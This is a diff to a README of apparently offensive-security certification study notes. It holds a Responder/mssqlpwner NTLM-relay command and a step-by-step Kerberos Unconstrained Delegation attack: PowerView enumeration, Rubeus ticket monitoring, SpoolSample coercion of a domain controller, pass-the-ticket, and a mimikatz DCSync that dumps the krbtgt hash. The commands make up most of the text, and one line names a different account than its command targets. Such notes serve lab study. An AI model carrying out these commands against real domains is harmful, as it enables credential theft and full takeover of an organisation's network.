Extravenger/OSEPlayground/README.md

 sudo responder -I tun0 (make sure SMB is turned OFF in /etc/responder/Responder.conf) mssqlpwner user:pass@<MSSQL INSTANCE IP> -windows-auth ntlm-relay <OUR ATTACKING MACHINE>
 ```

+# Kerberos Delegation

+## Unconstrained Delegation

+- Enumerate: `Get-DomainComputer -Unconstrained -Properties useraccountcontrol,dnshostname | fl`
+Any computer account that contains the `TRUSTED_FOR_DELEGATION` value in its UserAccountControl (UAC) attribute is a viable target.

+### Attack Walkthrough

+In a high-integrity PS/CMD prompt on the system configured for Unconstrained Delegation, run Rubeus in monitor mode:
+- `.\Rubeus.exe monitor interval:5 /nowrap`

+Next, using a domain credential that you’ve previously compromised, trigger the printerbug.py or SpoolSample on the domain controller:
+- `.\SpoolSample.exe DC01.HACKER.LAB HELPDESK.HACKER.LAB`

+`DC01.HACKER.LAB` is the domain controller we want to compromise
+`HELPDESK.HACKER.LAB` is the machine with delegation enabled that we control.

+Now, we can inject the ticket into memory using Rubeus:
+- `.\Rubeus.exe ptt /ticket:<BASE64 STRING>`

+To complete the attack, we’ll use mimikatz to perform a DCSync using the DC01$ TGT and request the NTLM hash for the dev\administrator account.
+- `lsadump::dcsync /user:megacorp\krbtgt /domain:megacorp.local`